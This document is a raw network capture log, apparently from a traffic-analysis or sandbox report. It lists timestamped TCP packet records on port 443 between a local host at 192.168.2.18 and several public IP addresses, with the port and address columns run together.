                                                                                                                                              Nov 6, 2024 16:54:48.413759947 CET49693443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:54:48.413805962 CET49693443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:54:48.414096117 CET4434969320.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:48.414154053 CET49693443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:54:48.414160967 CET4434969320.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:48.414172888 CET4434969320.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:48.414185047 CET4434969320.190.159.0192.168.2.18
                                                                                                                                              Nov 6, 2024 16:54:48.414211988 CET49693443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:54:48.465167999 CET49693443192.168.2.1820.190.159.0
                                                                                                                                              Nov 6, 2024 16:54:49.963200092 CET49679443192.168.2.1852.182.141.63
                                                                                                                                              Nov 6, 2024 16:54:54.768196106 CET49679443192.168.2.1852.182.141.63
                                                                                                                                              Nov 6, 2024 16:54:57.241199970 CET49673443192.168.2.18204.79.197.203
                                                                                                                                              Nov 6, 2024 16:55:04.372337103 CET49679443192.168.2.1852.182.141.63
                                                                                                                                              Nov 6, 2024 16:55:20.669764042 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:20.669814110 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:20.669912100 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:20.670500040 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:20.670514107 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:21.546463013 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:21.546835899 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:21.546869993 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:21.547991991 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:21.548108101 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:21.550406933 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:21.550492048 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:21.550702095 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:21.550719023 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:21.599128008 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.329758883 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.329782963 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.329811096 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.329827070 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.329849005 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.329916954 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.329950094 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.329986095 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.330012083 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.331331015 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.331350088 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.331418037 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.331444025 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.331509113 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.353549957 CET49740443192.168.2.1818.66.147.86
                                                                                                                                              Nov 6, 2024 16:55:22.353591919 CET4434974018.66.147.86192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.353702068 CET49740443192.168.2.1818.66.147.86
                                                                                                                                              Nov 6, 2024 16:55:22.353977919 CET49740443192.168.2.1818.66.147.86
                                                                                                                                              Nov 6, 2024 16:55:22.353991032 CET4434974018.66.147.86192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.463805914 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.463840961 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.463907003 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.463948011 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.463980913 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.464709044 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.464735985 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.464776993 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.464796066 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.464814901 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.464852095 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.465544939 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.465565920 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.465641022 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.465662003 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.465704918 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.469281912 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.469324112 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.469391108 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.469836950 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.469906092 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.469969988 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.470119953 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.470133066 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.470289946 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.470307112 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.487577915 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.487605095 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.487692118 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.487725019 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.487782001 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.599338055 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.599375010 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.599407911 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.599453926 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.599486113 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.599509001 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.599526882 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.599546909 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:22.599570036 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.599600077 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.600904942 CET49736443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:22.600925922 CET44349736159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.198446035 CET4434974018.66.147.86192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.198781967 CET49740443192.168.2.1818.66.147.86
                                                                                                                                              Nov 6, 2024 16:55:23.198793888 CET4434974018.66.147.86192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.199875116 CET4434974018.66.147.86192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.200022936 CET49740443192.168.2.1818.66.147.86
                                                                                                                                              Nov 6, 2024 16:55:23.201044083 CET49740443192.168.2.1818.66.147.86
                                                                                                                                              Nov 6, 2024 16:55:23.201114893 CET4434974018.66.147.86192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.201283932 CET49740443192.168.2.1818.66.147.86
                                                                                                                                              Nov 6, 2024 16:55:23.201291084 CET4434974018.66.147.86192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.251367092 CET49740443192.168.2.1818.66.147.86
                                                                                                                                              Nov 6, 2024 16:55:23.338498116 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.338840961 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.338852882 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.339202881 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.339510918 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.339567900 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.339670897 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.367723942 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.368030071 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.368052959 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.368418932 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.368752956 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.368828058 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.368889093 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.378833055 CET49748443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:55:23.378879070 CET443497484.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.378954887 CET49748443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:55:23.379357100 CET49748443192.168.2.184.245.163.56
                                                                                                                                              Nov 6, 2024 16:55:23.379369020 CET443497484.245.163.56192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.387327909 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.411341906 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.565149069 CET4434974018.66.147.86192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.565179110 CET4434974018.66.147.86192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.565187931 CET4434974018.66.147.86192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.565197945 CET4434974018.66.147.86192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.565227985 CET4434974018.66.147.86192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.565311909 CET49740443192.168.2.1818.66.147.86
                                                                                                                                              Nov 6, 2024 16:55:23.565329075 CET4434974018.66.147.86192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.565366983 CET49740443192.168.2.1818.66.147.86
                                                                                                                                              Nov 6, 2024 16:55:23.565381050 CET49740443192.168.2.1818.66.147.86
                                                                                                                                              Nov 6, 2024 16:55:23.566203117 CET4434974018.66.147.86192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.566283941 CET4434974018.66.147.86192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.566385031 CET49740443192.168.2.1818.66.147.86
                                                                                                                                              Nov 6, 2024 16:55:23.566385031 CET49740443192.168.2.1818.66.147.86
                                                                                                                                              Nov 6, 2024 16:55:23.566844940 CET49740443192.168.2.1818.66.147.86
                                                                                                                                              Nov 6, 2024 16:55:23.566844940 CET49740443192.168.2.1818.66.147.86
                                                                                                                                              Nov 6, 2024 16:55:23.566857100 CET4434974018.66.147.86192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.566916943 CET49740443192.168.2.1818.66.147.86
                                                                                                                                              Nov 6, 2024 16:55:23.579531908 CET49749443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:23.579560995 CET44349749104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.579649925 CET49749443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:23.579864979 CET49749443192.168.2.18104.26.8.185
                                                                                                                                              Nov 6, 2024 16:55:23.579876900 CET44349749104.26.8.185192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.581877947 CET49750443192.168.2.1818.66.147.68
                                                                                                                                              Nov 6, 2024 16:55:23.581912041 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.581974983 CET49750443192.168.2.1818.66.147.68
                                                                                                                                              Nov 6, 2024 16:55:23.582138062 CET49750443192.168.2.1818.66.147.68
                                                                                                                                              Nov 6, 2024 16:55:23.582154036 CET4434975018.66.147.68192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.732167959 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.732196093 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.732239962 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.732269049 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.732306957 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.732323885 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.732362986 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.737507105 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.737528086 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.737576962 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.737586975 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.737598896 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.772800922 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.772833109 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.772849083 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.772897959 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.772918940 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.772933960 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.772972107 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.779000044 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.779043913 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.779112101 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.779126883 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.779143095 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.779162884 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.792138100 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.867654085 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.867686033 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.867746115 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.867779970 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.867794991 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.867830038 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.872324944 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.872348070 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.872406006 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.872425079 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.872447014 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.872471094 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.873878956 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.873895884 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.873960972 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.873975039 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.874021053 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.894159079 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.894180059 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.894253016 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.894282103 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.894332886 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.913990021 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.914040089 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.914124012 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.914150953 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.914207935 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.917711020 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.917733908 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.917784929 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.917799950 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.917813063 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.917834044 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.919645071 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.919662952 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.919733047 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.919743061 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.919796944 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.942069054 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.942099094 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.942167997 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.942188978 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.942214012 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.942230940 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:23.961647034 CET49752443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:23.961674929 CET44349752169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:23.961745977 CET49752443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:23.961966991 CET49752443192.168.2.18169.150.236.104
                                                                                                                                              Nov 6, 2024 16:55:23.961977005 CET44349752169.150.236.104192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.004664898 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.004688025 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.004767895 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.004803896 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.004858971 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.007343054 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.007366896 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.007431030 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.007446051 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.007503033 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.007904053 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.007920027 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.007986069 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.007997036 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.008063078 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.008737087 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.008760929 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.008810043 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.008817911 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.008841038 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.008873940 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.009922981 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.009939909 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.010004044 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.010011911 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.010075092 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.010607004 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.010623932 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.010690928 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.010699987 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.010754108 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.011424065 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.011441946 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.011506081 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.011513948 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.011559963 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.063821077 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.063852072 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.063956022 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.063985109 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.064050913 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.064295053 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.064312935 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.064357996 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.064369917 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.064389944 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.064421892 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.065145969 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.065165997 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.065218925 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.065228939 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.065267086 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.068969965 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.068989992 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.069031000 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.069067001 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.069087982 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.069116116 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.069148064 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.069420099 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.069444895 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.069487095 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.069494963 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.069516897 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.070141077 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.070169926 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.070200920 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.070209980 CET44349746159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.070235014 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.124129057 CET49746443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.142971992 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.142997980 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.143138885 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.143157005 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.143204927 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.143563032 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.143579960 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.143634081 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.143640995 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.143688917 CET49747443192.168.2.18159.69.48.31
                                                                                                                                              Nov 6, 2024 16:55:24.143913031 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.143938065 CET44349747159.69.48.31192.168.2.18
                                                                                                                                              Nov 6, 2024 16:55:24.143990040 CET49747443192.168.2.18159.69.48.31
